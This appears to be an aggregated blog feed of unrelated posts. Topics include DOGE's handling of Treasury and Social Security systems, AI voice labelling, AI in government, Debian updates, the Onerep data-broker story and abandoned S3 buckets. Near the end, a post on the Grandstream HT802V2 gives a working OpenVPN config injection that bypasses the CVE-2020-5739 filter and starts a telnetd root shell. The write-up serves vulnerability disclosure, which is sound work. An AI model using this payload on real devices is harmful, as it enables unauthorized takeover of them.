For example, step 1 is "question every requirement", which is obvious- of course, if you're trying to make this more efficient, you should question the requirements. As a sub-head on that, though, Musk says that requirements should be traceable directly to individuals, not departments. On one hand, this could be good for accountability, but on the other, any sufficiently complex system is going to have requirements that have to be built through collaboration, where any individual claiming the requirement is really just doing so to be a point of accountability.
Step 2, also has a blindingly obvious label: "delete any part of the process you can". Oh, very good, why didn't I think of that! But Musk has a "unique" way of figuring out what parts of the process can be deleted: "You may have to add them back later. In fact, if you do not end up adding back at least 10 percent of them, then you didn’t delete enough."
Or, to put it less charitably: break things, and then unbreak them when you realize what you broke, if you do.
We can see how this plays out in practice, because Musk played this game when he took over Twitter. And sure, it's revenue has collapsed, but we don't care about that here. What we care about are stupid IT stories, like the new owner renting a U-Haul and hiring a bunch of gig workers to manually decommission an expensive data center. Among the parts of the process Musk deleted were:
Shutting down the servers in an orderly fashion
Using the proper tools to uninstall the server racks
Protecting the flooring which wasn't designed to roll 2,500lb server racks
Not wiping the hard drives which contained user data and proprietary information
Not securing that valuable data with anything more than a set of Home Depot padlocks and Apple AirTags
And, shockingly, despite thinking this was successful in the moment, the resulting instability caused by just ripping a datacenter out led Musk to admit this was a mistake.
So let's take a look at how this plays out with DOGE. One of the major efforts was taking over the Treasury Department's IT systems. These are systems which handle $5 trillion in payments every year. And who do we put in change? Some random wet-behind-the-ears dev with a history of racist posts on the Internet.
Part of the goal was to just stop payments, following the Muskian "Break things first, and unbreak them if it was a mistake," optimization strategy. Stop paying people, and if you find out you needed to pay them, then start paying them again. Step 2 of the "algorithm".
Speaking of payments, many people in the US depend on payments from the Social Security Administration. This organization, founded in 1935 as part of the New Deal, handles all sorts of benefits, including retirement benefits. According to Musk, it's absolutely riddled with fraud.
What are his arguments? Well, for starters, he worries that SSNs are not de-duplicated- that is, the same SSN could appear multiple times in the database.
Social Security Administration has, since the 1940s, been trying to argue against using SSNs as identifiers for any purpose other than Social Security. They have a history page which is a delightful read as a "we can't say the Executive Orders and laws passed which expanded the use of SSNs into domains where they shouldn't have been used was a bad idea, but we can be real salty about it," document. It's passive-aggression perfected. But you and I already know you should never expect SSNs to be a key.
Also, assuming the SSA systems are mainframe systems, using flat file databases, we would expect a large degree of denormalization. Seeing "unique" keys repeated in the dataset is normal.
On the same subject, Musk has decided that people over 150 years old are collecting Social Security benefits. Now, one could assume that this kind of erroneous data pattern is fraud, or we could wonder if there's an underlying reason to the pattern.
Now, I've seen a lot of discussion on the Internet about this being an epoch related thing, which is certainly possible, but I think the idea that it's related to ISO8601 is obviously false- ISO8601 is just a string representation of dates, and also was standardized well after COBOL and well after SSA started computerizing. Because the number 150 was used, some folks have noted that would be 1875, and have suspected that the date of the Metre Convention is the epoch.
I can't find any evidence that any of this is true, mind you, but we're also reacting to a tweet by a notorious moron, and I have to wonder: did he maybe round off 5 years? Because 1870 is exactly 65 years before 1935- the year Social Security started, and 65 years is the retirement age where you can start collecting Social Security. Thus, the oldest date which the SSA would ever care about was 1870. Though, there's another completely un-epoch related reason why you could have Social Security accounts well older than 150 years: your benefits can continue to be paid out to your spouse and dependents after your death. If an 80 year old marries a 20 year old, and dies the next day, that 20 year old could collect benefits on that account.
The key point I'm making is that "FRAUUUDDDD!!1111!!!" is really not the correct reaction to a system you don't understand. And while there may be many better ways to handle dates within the SSA's software, the system predates computers and has needed to maintain its ability to pay benefits for 90 years. While you could certainly make improvements, what you can't do is take a big "algorithm" Number 2 all over it.
There are so, so many more things that could be discussed here, but let's close with the DOGE website. Given that DOGE operates by walking into government agencies and threatening to call Elon, there are some serious concerns over transparency. Who is doing what, when, why and with what authority? The solution? Repost a bunch of tweets to a website with a .gov domain name.
In the end, the hacked website is really just Elon Musk's "algorithm" improved: instead of breaking things that are already working, you just start with a broken website.
[Advertisement]
BuildMaster allows you to create a self-service release management platform that allows different teams to manage their applications. Explore how!
Author: Julian Miles, Staff Writer He’s going to watch it again. Unbelievable. “Any chance of a coffee?” The stare is a definite ‘no’ with an attempt at being hard. “You can ask for details. I was there.” Plus I have complete recall thanks to my action audit unit. I got it turned on after some […]
Author: Alastair Millar I should have said something. Today, I know that—but back then, I was still young and stupid. So I’m recording this now that I’m old and hopefully wiser, for all the good it will do. I was desperate when I signed up for the Settler Corps, with nothing left after a layoff […]
In the span of just weeks, the US government has experienced what may be the most consequential security breach in its history—not through a sophisticated cyberattack or an act of foreign espionage, but through official orders by a billionaire with a poorly defined government role. And the implications for national security are profound.
First, it was reported that people associated with the newly created Department of Government Efficiency (DOGE) had accessedtheUSTreasury computer system, giving them the ability to collect data on and potentially control the department’s roughly $5.45 trillion in annual federal payments.
Then, we learned that uncleared DOGE personnel had gained access to classified data from the US Agency for International Development, possibly copying it onto their own systems. Next, the Office of Personnel Management—which holds detailed personal data on millions of federal employees, including those with security clearances—wascompromised. After that, Medicaid and Medicare records were compromised.
Meanwhile, only partially redacted names of CIA employees were sent over an unclassified email account. DOGE personnel are also reported to be feeding Education Department data into artificial intelligence software, and they have also started working at the Department of Energy.
This story is moving very fast. On Feb. 8, a federal judge blocked the DOGE team from accessing the Treasury Department systems any further. But given that DOGE workers have already copied data and possibly installed and modified software, it’s unclear how this fixes anything.
In any case, breaches of other critical government systems are likely to follow unless federal employees stand firm on the protocols protecting national security.
The systems that DOGE is accessing are not esoteric pieces of our nation’s infrastructure—they are the sinews of government.
For example, the Treasury Department systems contain the technical blueprints for how the federal government moves money, while the Office of Personnel Management (OPM) network contains information on who and what organizations the government employs and contracts with.
What makes this situation unprecedented isn’t just the scope, but also the method of attack. Foreign adversaries typically spend years attempting to penetrate government systems such as these, using stealth to avoid being seen and carefully hiding any tells or tracks. The Chinese government’s 2015 breach of OPM was a significant US security failure, and it illustrated how personnel data could be used to identify intelligence officers and compromise national security.
In this case, external operators with limited experience and minimal oversight are doing their work in plain sight and under massive public scrutiny: gaining the highest levels of administrative access and making changes to the United States’ most sensitive networks, potentially introducing new security vulnerabilities in the process.
But the most alarming aspect isn’t just the access being granted. It’s the systematic dismantling of security measures that would detect and prevent misuse—including standard incident response protocols, auditing, and change-tracking mechanisms—by removing the career officials in charge of those security measures and replacing them with inexperienced operators.
The Treasury’s computer systems have such an impact on national security that they were designed with the same principle that guides nuclear launch protocols: No single person should have unlimited power. Just as launching a nuclear missile requires two separate officers turning their keys simultaneously, making changes to critical financial systems traditionally requires multiple authorized personnel working in concert.
This approach, known as “separation of duties,” isn’t just bureaucratic red tape; it’s a fundamental security principle as old as banking itself. When your local bank processes a large transfer, it requires two different employees to verify the transaction. When a company issues a major financial report, separate teams must review and approve it. These aren’t just formalities—they’re essential safeguards against corruption and error. These measures have been bypassed or ignored. It’s as if someone found a way to rob Fort Knox by simply declaring that the new official policy is to fire all the guards and allow unescorted visits to the vault.
The implications for national security are staggering. Sen. Ron Wyden said his office had learned that the attackers gained privileges that allow them to modify core programs in Treasury Department computers that verify federal payments, access encrypted keys that secure financial transactions, and alter audit logs that record system changes. Over at OPM, reports indicate that individuals associated with DOGE connected an unauthorized server into the network. They are also reportedly trainingAI software on all of this sensitive data.
This is much more critical than the initial unauthorized access. These new servers have unknown capabilities and configurations, and there’s no evidence that this new code has gone through any rigorous security testing protocols. The AIs being trained are certainly not secure enough for this kind of data. All are ideal targets for any adversary, foreign or domestic, also seeking access to federal data.
There’s a reason why every modification—hardware or software—to these systems goes through a complex planning process and includes sophisticated access-control mechanisms. The national security crisis is that these systems are now much more vulnerable to dangerous attacks at the same time that the legitimate system administrators trained to protect them have been locked out.
By modifying core systems, the attackers have not only compromised current operations, but have also left behind vulnerabilities that could be exploited in future attacks—giving adversaries such as Russia and China an unprecedentedopportunity. These countries have long targeted these systems. And they don’t just want to gather intelligence—they also want to understand how to disrupt these systems in a crisis.
Now, the technical details of how these systems operate, their security protocols, and their vulnerabilities are now potentially exposed to unknown parties without any of the usual safeguards. Instead of having to breach heavily fortified digital walls, these parties  can simply walk through doors that are being propped open—and then erase evidence of their actions.
The security implications span three critical areas.
First, system manipulation: External operators can now modify operations while also altering audit trails that would track their changes. Second, data exposure: Beyond accessing personal information and transaction records, these operators can copy entire system architectures and security configurations—in one case, the technical blueprint of the country’s federal payment infrastructure. Third, and most critically, is the issue of system control: These operators can alter core systems and authentication mechanisms while disabling the very tools designed to detect such changes. This is more than modifying operations; it is modifying the infrastructure that those operations use.
To address these vulnerabilities, three immediate steps are essential. First, unauthorized access must be revoked and proper authentication protocols restored. Next, comprehensive system monitoring and change management must be reinstated—which, given the difficulty of cleaning a compromised system, will likely require a complete system reset. Finally, thorough audits must be conducted of all system changes made during this period.
This is beyond politics—this is a matter of national security. Foreign national intelligence organizations will be quick to take advantage of both the chaos and the new insecurities to steal US data and install backdoors to allow for future access.
Each day of continued unrestricted access makes the eventual recovery more difficult and increases the risk of irreversible damage to these critical systems. While the full impact may take time to assess, these steps represent the minimum necessary actions to begin restoring system integrity and security protocols.
Assuming that anyone in the government still cares.
This essay was written with Davi Ottenheimer, and originally appeared in Foreign Policy.
Most people know that robots no longer sound like tinny trash cans. They sound like Siri, Alexa, and Gemini. They sound like the voices in labyrinthine customer support phone trees. And even those robot voices are being made obsolete by new AI-generated voices that can mimic every vocal nuance and tic of human speech, down to specific regional accents. And with just a few seconds of audio, AI can now clone someone’s specific voice.
This technology will replace humans in many areas. Automated customer support will save money by cutting staffing at call centers. AI agents will make calls on our behalf, conversing with others in natural language. All of that is happening, and will be commonplace soon.
But there is something fundamentally different about talking with a bot as opposed to a person. A person can be a friend. An AI cannot be a friend, despite how people might treat it or react to it. AI is at best a tool, and at worst a means of manipulation. Humans need to know whether we’re talking with a living, breathing person or a robot with an agenda set by the person who controls it. That’s why robots should sound like robots.
You can’t just label AI-generated speech. It will come in many different forms. So we need a way to recognize AI that works no matter the modality. It needs to work for long or short snippets of audio, even just a second long. It needs to work for any language, and in any cultural context. At the same time, we shouldn’t constrain the underlying system’s sophistication or language complexity.
We have a simple proposal: all talking AIs and robots should use a ring modulator. In the mid-twentieth century, before it was easy to create actual robotic-sounding speech synthetically, ring modulators were used to make actors’ voices sound robotic. Over the last few decades, we have become accustomed to robotic voices, simply because text-to-speech systems were good enough to produce intelligible speech that was not human-like in its sound. Now we can use that same technology to make robotic speech that is indistinguishable from human sound robotic again.
A ring modulator has several advantages: It is computationally simple, can be applied in real-time, does not affect the intelligibility of the voice, and—most importantly—is universally “robotic sounding” because of its historical usage for depicting robots.
Responsible AI companies that provide voice synthesis or AI voice assistants in any form should add a ring modulator of some standard frequency (say, between 30-80 Hz) and of a minimum amplitude (say, 20 percent). That’s it. People will catch on quickly.
Here are a couple of examples you can listen to for examples of what we’re suggesting. The first clip is an AI-generated “podcast” of this article made by Google’s NotebookLM featuring two AI “hosts.” Google’s NotebookLM created the podcast script and audio given only the text of this article. The next two clips feature that same podcast with the AIs’ voices modulated more and less subtly by a ring modulator:
Raw audio sample generated by Google’s NotebookLM
Audio sample with added ring modulator (30 Hz-25%)
Audio sample with added ring modulator (30 Hz-40%)
We were able to generate the audio effect with a 50-line Python script generated by Anthropic’s Claude. One of the most well-known robot voices were those of the Daleks from Doctor Who in the 1960s. Back then robot voices were difficult to synthesize, so the audio was actually an actor’s voice run through a ring modulator. It was set to around 30 Hz, as we did in our example, with different modulation depth (amplitude) depending on how strong the robotic effect is meant to be. Our expectation is that the AI industry will test and converge on a good balance of such parameters and settings, and will use better tools than a 50-line Python script, but this highlights how simple it is to achieve.
Of course there will also be nefarious uses of AI voices. Scams that use voice cloning have been getting easier every year, but they’ve been possible for many years with the right know-how. Just like we’re learning that we can no longer trust images and videos we see because they could easily have been AI-generated, we will all soon learn that someone who sounds like a family member urgently requesting money may just be a scammer using a voice-cloning tool.
We don’t expect scammers to follow our proposal: They’ll find a way no matter what. But that’s always true of security standards, and a rising tide lifts all boats. We think the bulk of the uses will be with popular voice APIs from major companies—and everyone should know that they’re talking with a robot.
This essay was written with Barath Raghavan, and originally appeared in IEEE Spectrum.
I wanted to follow new content posted to Printables.com
with a feed reader, but Printables.com doesn't provide one. Neither do the other
obvious 3d model catalogues. So, I started building one.
I have something that spits out an Atom feed and a couple of beta testers gave
me some valuable feedback. I had planned to make it public, with the ultimate
goal being to convince Printables.com to implement feeds themselves.
Meanwhile, I stumbled across someone else who has done basically the same thing.
Here are 3rd party feeds for
The format of their feeds is JSON-Feed,
which is new to me. FreshRSS and
NetNewsWire seems happy with it. (I went with
Atom.) I may still release my take, if I find time to make one improvmment that
my beta-testers suggested.
Because we still have the NWS, I learned that "A winter storm will continue
to bring areas of heavy snow and ice from the Great Lakes through New England
today into tonight." I'm staying put, and apparently so is Dave L.'s
delivery driver.
Dave L.
imagines the thoughts of this driver who clearly turned around and headed straight home.
"Oh, d'ya mean I've got to take these parcels somewhere!? in this weather!? I can't just bring them back?"
Infoscavenger
Andrew G.
shared a found object.
"I got this from https://bsky.app/profile/jesseberney.com/post/3lhyiubtay22r and
immediately thought of you. Sadly I expect you're
going to get more of these in the coming days/weeks." I guess they already fired all
people who knew how to use Mail Merge.
Bruce R.
"I saw this ad in my Android weather app. They think they know all about you, but they got this completely wrong:
I don't live in {city}, I live in [city]!" Right next to Mr. [EmployeeLastName].
"I've got a vintage k8s cluster if anyone's interested," reports
Mike S.
"I just installed docker desktop. Apparently it ships with the zeroeth version of kubernetes."
Finally for this week, special character
Vitra
has sent us an elliptical statement about her uni application.
"Of course, putting characters in my personal statement is simply a bad idea - it's best to let the Universities have the thrill of mystery!
(From UCAS, the main university application thing in the UK too!)
"
Keep warm.
[Advertisement] Plan Your .NET 9 Migration with Confidence Your journey to .NET 9 is more than just one decision.Avoid migration migraines with the advice in this free guide. Download Free Guide Now!
Author: Dart Humeston “The last time I felt like this, I woke up in the year 1981.” I explained to the attractive woman after I appeared out of thin air in her kitchen. “I sensed static electricity in my body and materialized in a video game arcade in Miami,” I continued, as she stood with […]
There were numerous security and non-security updates to Debian 11 (codename “bullseye”) during January.
Notable security updates:
rsync, prepared by Thorsten Alteholz, fixed several CVEs (including information leak and path traversal vulnerabilities)
tomcat9, prepared by Markus Koschany, fixed several CVEs (including denial of service and information disclosure vulnerabilities)
ruby2.7, prepared by Bastien Roucariès, fixed several CVEs (including denial of service vulnerabilities)
tiff, prepared by Adrian Bunk, fixed several CVEs (including NULL ptr, buffer overflow, use-after-free, and segfault vulnerabilities)
Notable non-security updates:
linux-6.1, prepared by Ben Hutchings, has been packaged for bullseye (this was done specifically to provide a supported upgrade path for systems that currently use kernel packages from the “bullseye-backports” suite)
debian-security-support, prepared by Santiago Ruano Rincón, which formalized the EOL of intel-mediasdk and node-matrix-js-sdk
In addition to the security and non-security updates targeting “bullseye”, various LTS contributors have prepared uploads targeting Debian 12 (codename “bookworm”) with fixes for a variety of vulnerabilities. Abhijith PA prepared an upload of puma; Bastien Roucariès prepared an upload of node-postcss with fixes for data processing and denial of service vulnerabilities; Daniel Leidert prepared updates for setuptools, python-asyncssh, and python-tornado; Lee Garrett prepared an upload of ansible-core; and Guilhem Moulin prepared updates for python-urllib3, sqlparse, and opensc. Santiago Ruano Rincón also worked on tracking and filing some issues about packages that need an update in recent releases to avoid regressions on upgrade. This relates to CVEs that were fixed in buster or bullseye, but remain open in bookworm. These updates, along with Santiago’s work on identifying and tracking similar issues, underscore the LTS Team’s commitment to ensuring that the work we do as part of LTS also benefits the current Debian stable release.
LTS contributor Sean Whitton also prepared an upload of jinja2 and Santiago Ruano Rincón prepared an upload of openjpeg2 for Debian unstable (codename “sid”), as part of the LTS Team effort to assist with package uploads to unstable.
In mid-March 2024, KrebsOnSecurity revealed that the founder of the personal data removal service Onerep also founded dozens of people-search companies. Shortly after that investigation was published, Mozilla said it would stop bundling Onerep with the Firefox browser and wind down its partnership with the company. But nearly a year later, Mozilla is still promoting it to Firefox users.
Mozilla offers Onerep to Firefox users on a subscription basis as part of Mozilla Monitor Plus. Launched in 2018 under the name Firefox Monitor, Mozilla Monitor also checks data from the website Have I Been Pwned? to let users know when their email addresses or password are leaked in data breaches.
The ink on that partnership agreement had barely dried before KrebsOnSecurity published a story showing that Onerep’s Belarusian CEO and founder Dimitiri Shelest launched dozens of people-search services since 2010, including a still-active data broker called Nuwber that sells background reports on people. This seemed to contradict Onerep’s stated motto, “We believe that no one should compromise personal online security and get a profit from it.”
Shelest released a lengthy statement (PDF) wherein he acknowledged maintaining an ownership stake in Nuwber, a consumer data broker he founded in 2015 — around the same time he started Onerep.
Onerep.com CEO and founder Dimitri Shelest, as pictured on the “about” page of onerep.com.
Shelest maintained that Nuwber has “zero cross-over or information-sharing with Onerep,” and said any other old domains that may be found and associated with his name are no longer being operated by him.
“I get it,” Shelest wrote. “My affiliation with a people search business may look odd from the outside. In truth, if I hadn’t taken that initial path with a deep dive into how people search sites work, Onerep wouldn’t have the best tech and team in the space. Still, I now appreciate that we did not make this more clear in the past and I’m aiming to do better in the future.”
When asked to comment on the findings, Mozilla said then that although customer data was never at risk, the outside financial interests and activities of Onerep’s CEO did not align with their values.
“We’re working now to solidify a transition plan that will provide customers with a seamless experience and will continue to put their interests first,” Mozilla said.
In October 2024, Mozilla published a statement saying the search for a different provider was taking longer than anticipated.
“While we continue to evaluate vendors, finding a technically excellent and values-aligned partner takes time,” Mozilla wrote. “While we continue this search, Onerep will remain the backend provider, ensuring that we can maintain uninterrupted services while we continue evaluating new potential partners that align more closely with Mozilla’s values and user expectations. We are conducting thorough diligence to find the right vendor.”
Asked for an update, Mozilla said the search for a replacement partner continues.
“The work’s ongoing but we haven’t found the right alternative yet,” Mozilla said in an emailed statement. “Our customers’ data remains safe, and since the product provides a lot of value to our subscribers, we’ll continue to offer it during this process.”
It’s a win-win for Mozilla that they’ve received accolades for their principled response while continuing to partner with Onerep almost a year later. But if it takes so long to find a suitable replacement, what does that say about the personal data removal industry itself?
Onerep appears to be working in partnership with another problematic people-search service: Radaris, which has a history of ignoring opt-out requests or failing to honor them. A week before breaking the story about Onerep, KrebsOnSecurity published research showing the co-founders of Radaris were two native Russian brothers who’d built a vast network of affiliate marketing programs and consumer data broker services.
Lawyers for the Radaris co-founders threatened to sue KrebsOnSecurity unless that story was retracted in full, claiming the founders were in fact Ukrainian and that our reporting had defamed the brothers by associating them with the actions of Radaris. Instead, we published a follow-up investigation which showed that not only did the brothers from Russia create Radaris, for many years they issued press releases quoting a fictitious CEO seeking money from investors.
Several readers have shared emails they received from Radaris after attempting to remove their personal data, and those messages show Radaris has been promoting Onerep.
Donald Trump and Elon Musk’s chaotic approach to reform is upending government operations. Critical functions have been halted, tens of thousands of federal staffers are being encouraged to resign, and congressional mandates are being disregarded. The next phase: The Department of Government Efficiency reportedly wants to use AI to cut costs. According to The Washington Post, Musk’s group has started to run sensitive data from government systems through AI programs to analyze spending and determine what could be pruned. This may lead to the elimination of human jobs in favor of automation. As one government official who has been tracking Musk’s DOGE team told the Post, the ultimate aim is to use AI to replace “the human workforce with machines.” (Spokespeople for the White House and DOGE did not respond to requests for comment.)
Using AI to make government more efficient is a worthy pursuit, and this is not a new idea. The Biden administration disclosed more than 2,000 AI applications in development across the federal government. For example, FEMA has started using AI to help perform damage assessment in disaster areas. The Centers for Medicare and Medicaid Services has started using AI to look for fraudulent billing. The idea of replacing dedicated and principled civil servants with AI agents, however, is new—and complicated.
The civil service—the massive cadre of employees who operate government agencies—plays a vital role in translating laws and policy into the operation of society. New presidents can issue sweeping executive orders, but they often have no real effect until they actually change the behavior of public servants. Whether you think of these people as essential and inspiring do-gooders, boring bureaucratic functionaries, or as agents of a “deep state,” their sheer number and continuity act as ballast that resists institutional change.
This is why Trump and Musk’s actions are so significant. The more AI decision making is integrated into government, the easier change will be. If human workers are widely replaced with AI, executives will have unilateral authority to instantaneously alter the behavior of the government, profoundly raising the stakes for transitions of power in democracy. Trump’s unprecedented purge of the civil service might be the last time a president needs to replace the human beings in government in order to dictate its new functions. Future leaders may do so at the press of a button.
To be clear, the use of AI by the executive branch doesn’t have to be disastrous. In theory, it could allow new leadership to swiftly implement the wishes of its electorate. But this could go very badly in the hands of an authoritarian leader. AI systems concentrate power at the top, so they could allow an executive to effectuate change over sprawling bureaucracies instantaneously. Firing and replacing tens of thousands of human bureaucrats is a huge undertaking. Swapping one AI out for another, or modifying the rules that those AIs operate by, would be much simpler.
Social-welfare programs, if automated with AI, could be redirected to systematically benefit one group and disadvantage another with a single prompt change. Immigration-enforcement agencies could prioritize people for investigation and detainment with one instruction. Regulatory-enforcement agencies that monitor corporate behavior for malfeasance could turn their attention to, or away from, any given company on a whim.
Even if Congress were motivated to fight back against Trump and Musk, or against a future president seeking to bulldoze the will of the legislature, the absolute power to command AI agents would make it easier to subvert legislative intent. AI has the power to diminish representative politics. Written law is never fully determinative of the actions of government—there is always wiggle room for presidents, appointed leaders, and civil servants to exercise their own judgment. Whether intentional or not, whether charitably or not, each of these actors uses discretion. In human systems, that discretion is widely distributed across many individuals—people who, in the case of career civil servants, usually outlast presidencies.
Today, the AI ecosystem is dominated by a small number of corporations that decide how the most widely used AI models are designed, which data they are trained on, and which instructions they follow. Because their work is largely secretive and unaccountable to public interest, these tech companies are capable of making changes to the bias of AI systems—either generally or with aim at specific governmental use cases—that are invisible to the rest of us. And these private actors are both vulnerable to coercion by political leaders and self-interested in appealing to their favor. Musk himself created and funded xAI, now one of the world’s largest AI labs, with an explicitly ideological mandate to generate anti-“woke” AI and steer the wider AI industry in a similar direction.
But there’s a second way that AI’s transformation of government could go. AI development could happen inside of transparent and accountable public institutions, alongside its continued development by Big Tech. Applications of AI in democratic governments could be focused on benefitting public servants and the communities they serve by, for example, making it easier for non-English speakers to access government services, making ministerial tasks such as processing routine applications more efficient and reducing backlogs, or helping constituents weigh in on the policies deliberated by their representatives. Such AI integrations should be done gradually and carefully, with public oversight for their design and implementation and monitoring and guardrails to avoid unacceptable bias and harm.
Governments around the world are demonstrating how this could be done, though it’s early days. Taiwan has pioneered the use of AI models to facilitate deliberative democracy at an unprecedented scale. Singapore has been a leader in the development of public AI models, built transparently and with public-service use cases in mind. Canada has illustrated the role of disclosure and public input on the consideration of AI use cases in government. Even if you do not trust the current White House to follow any of these examples, U.S. states—which have much greater contact and influence over the daily lives of Americans than the federal government—could lead the way on this kind of responsible development and deployment of AI.
As the political theorist David Runciman has written, AI is just another in a long line of artificial “machines” used to govern how people live and act, not unlike corporations and states before it. AI doesn’t replace those older institutions, but it changes how they function. As the Trump administration forges stronger ties to Big Tech and AI developers, we need to recognize the potential of that partnership to steer the future of democratic governance—and act to make sure that it does not enable future authoritarians.
This essay was written with Nathan E. Sanders, and originally appeared in The Atlantic.
I've just passed my 10th anniversary of starting at
Red Hat! As a personal milestone, this is the longest
I've stayed in a job: I managed 10 years at Newcastle University,
although not in one continuous role.
I haven't exactly worked in one continuous role at Red Hat either, but it
feels like what I do Today is a logical evolution from what I started doing,
whereas in Newcastle I jumped around a bit.
I've seen some changes: in my time here, we changed the logo from Shadow Man;
we transitioned to using Google Workspace for lots of stuff, instead of
in-house IT; we got bought by IBM; we changed President and CEO, twice. And
millions of smaller things.
I won't reach an 11th: my Organisation in Red Hat is moving to
IBM. I think
this is sad news for Red Hat: they're losing some great people. But I'm
optimistic for the future of my Organisation.
Google seems to be more into tracking web users and generally becoming hostile to users [1]. So using a browser other than Chrome seems like a good idea. The problem is the lack of browsers with security support. It seems that the only browser engines with the quality of security support we expect in Debian are Firefox and the Chrome engine. The Chrome engine is used in Chrome, Chromium, and Microsoft Edge. Edge of course isn’t an option and Chromium still has some of the Google anti-features built in.
Firefox
So I tried to use Firefox for the things I do. One feature of Chrome based browsers that I really like is the ability to set a custom page for the new tab. This feature was removed because it was apparently being constantly attacked by malware [2]. There are addons to allow that but I prefer to have a minimal number of addons and not have any that are just to replace deliberately broken settings in the browser. Also those addons can’t set a file for the URL, so I could set a web server for it but it’s annoying to have to setup a web server to work around a browser limitation.
Another thing that annoyed me was YouTube videos open in new tabs not starting to play when I change to the tab. There’s a Firefox setting for allowing web sites to autoplay but there doesn’t seem to be a way to add sites to the list.
The Ungoogled Chromium project has a lot to offer for safer web browsing [5]. But the changes are invasive and it’s not included in Debian. Some of the changes like “replacing many Google web domains in the source code with non-existent alternatives ending in qjz9zk” are things that could be considered controversial. It definitely isn’t a candidate to replace the current Chromium package in Debian but might be a possibility to have as an extra browser.
What Next?
The Falcon browser that is part of the KDE project looks good, but QtWebEngine doesn’t have security support in Debian. Would it be possible to provide security support for it?
Ungoogled Chromium is available in Flatpak, so I’ll test that out. But ideally it would be packaged for Debian. I’ll try building a package of it and see how that goes.
Last November, the DebConf25 Team
asked
the community to help design the logo for the 25th
Debian Developers' Conference and the results
are in! The logo contest received
23 submissions
and we thank all the 295 people who took the time to participate in the
survey. There were several amazing proposals, so choosing was not easy.
We are pleased to
announce
that the winner of the logo survey is 'Tower with red Debian Swirl originating
from blue water' (option L), by Juliana Camargo and licensed CC BY-SA 4.0.
Juliana also shared with us a bit of her motivation, creative process and
inspiration when designing her logo:
The idea for this logo came from the city's landscape, the place where the
medieval tower looks over the river that meets the sea, almost like
guarding it. The Debian red swirl comes out of the blue water splash as a
continuous stroke, and they are also the French flag colours. I tried to
combine elements from the city when I was sketching in the notebook,
which is an important step for me as I feel that ideas flow much more
easily, but the swirl + water with the tower was the most refreshing
combination, so I jumped to the computer to design it properly. The water
bit was the most difficult element, and I used the Debian swirl as a base
for it, so both would look consistent. The city name font is a modern
calligraphy style and the overall composition is not symmetric but balanced
with the different elements. I am glad that the Debian community felt
represented with this logo idea!
Congratulations, Juliana, and thank you very much for your contribution to
Debian!
The DebConf25 Team would like to take this opportunity to remind you that
DebConf, the annual international Debian Developers Conference, needs your
help. If you want to help with the DebConf 25 organization, don't hesitate to
reach out to us via the #debconf-team
channel on OFTC.
Furthermore, we are always looking for sponsors. DebConf is run on a
non-profit basis, and all financial contributions allow us to bring together
a large number of contributors from all over the globe to
work collectively on Debian. Detailed information about the
sponsorship opportunities
is available on the DebConf 25 website.
Abdoullah sends us this little blob of C#, which maybe isn't a full-on WTF, but certainly made me chuckle.
if (file!= null)
{
if (file.name.StartsWith(userName))
{
if (file.name.StartsWith(userName))
{
url = string.Format(FILE_LINK, file.itemId, file.name);
break;
}
}
}
Are you sure the file name starts with the user name? Are you really sure?
This code somehow slipped by code review, helped perhaps by the fact that the author was the senior-most team member and everyone assumed they were immune to these kinds of mistakes.
No one is immune.
[Advertisement]
Utilize BuildMaster to release your software with confidence, at the pace your business demands. Download today!
Author: GW LeCroy Tokyo lay far below, smothered in a century-old, neon-streaked smog. A constant wail rose into Asami’s room from somewhere in the haze, sharp and setting her on edge. But above, a thousand shooting stars blazed orange-yellow trails across the navy sky. Asami’s eyes gleamed with awe, a thousand wishes flooded her heart. […]
The RcppUUID package
on CRAN has been providing
UUIDs (based on the underlying Boost
library) for several years. Written by Artem Klemsov and maintained
in this gitlab
repo, the package is a very nice example of clean and
straightforward library binding. As it had dropped off CRAN over a relatively minor
issue, I descided to adopted it with the previous 1.1.2
release made quite recently.
This release adds new high-resolution clock-based UUIDs accordingt to
the v7 spec. Internally 100ns increments are represented. The resulting
UUIDs are both unique and sortable. I added this recent example to the
README.md which illustrated both the implicit ordering and uniqueness.
The unit tests check this with a much larger N.
While one can revert from the UUID object to the clock
object, I am not aware of a text parser so there is currently no inverse
function (as ulid offers) for the character
representation.
The NEWS entry for the two releases follows.
Changes in version 1.2.0
(2025-02-12)
Time-based UUIDs, ie version 7, can now be generated (requiring
Boost 1.86 or newer as in the current BH
package)
Here’s a supply-chain attack just waiting to happen. A group of researchers searched for, and then registered, abandoned Amazon S3 buckets for about $400. These buckets contained software libraries that are still used. Presumably the projects don’t realize that they have been abandoned, and still ping them for patches, updates, and etc.
The TL;DR is that this time, we ended up discovering ~150 Amazon S3 buckets that had previously been used across commercial and open source software products, governments, and infrastructure deployment/update pipelines—and then abandoned.
Naturally, we registered them, just to see what would happen—”how many people are really trying to request software updates from S3 buckets that appear to have been abandoned months or even years ago?”, we naively thought to ourselves.
Turns out they got eight million requests over two months.
Had this been an actual attack, they would have modified the code in those buckets to contain malware and watch as it was incorporated in different software builds around the internet. This is basically the SolarWinds attack, but much more extensive.
But there’s a second dimension to this attack. Because these update buckets are abandoned, the developers who are using them also no longer have the power to patch them automatically to protect them. The mechanism they would use to do so is now in the hands of adversaries. Moreover, often—but not always—losing the bucket that they’d use for it also removes the original vendor’s ability to identify the vulnerable software in the first place. That hampers their ability to communicate with vulnerable installations.
Software supply-chain security is an absolute mess. And it’s not going to be easy, or cheap, to fix. Which means that it won’t be. Which is an even worse mess.
I have a Grandstream HT802V2 running firmware 1.0.3.5 and while playing around with the VPN settings realized that the sanitization of the "Additional Options" field done for CVE-2020-5739 is not sufficient.
Before the fix for CVE-2020-5739, /etc/rc.d/init.d/openvpn did
Looking at the OpenVPN configuration template (/etc/openvpn/openvpn.conf), it already uses up and therefor sets script-security 2, so injecting that is unnecessary.
Thus if one can somehow inject "/bin/ash -c 'telnetd -l /bin/sh -p 1271'" in one of the command-executing options, a reverse shell will be opened.
The filtering looks for lines that start with zero or more occurrences of a space, followed by the option name (up, down, etc), followed by another space.
While OpenVPN happily accepts tabs instead of spaces in the configuration file, I wasn't able to inject a tab neither via the web interface, nor via SSH/gs_config.
However, OpenVPN also allows quoting, which is only documented for parameters, but works just well for option names too.
That means that instead of
up "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
from the original exploit by Tenable, we write
"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
this still will be a valid OpenVPN configuration statement, but the filtering in /etc/rc.d/init.d/openvpn won't catch it and the resulting OpenVPN configuration will include the exploit:
Yes, we actually do have code reviews and testing practices. A version of this code was tested successfully prior to this version being merged in, somehow.
Well, that's ominous. Let's look at the code.
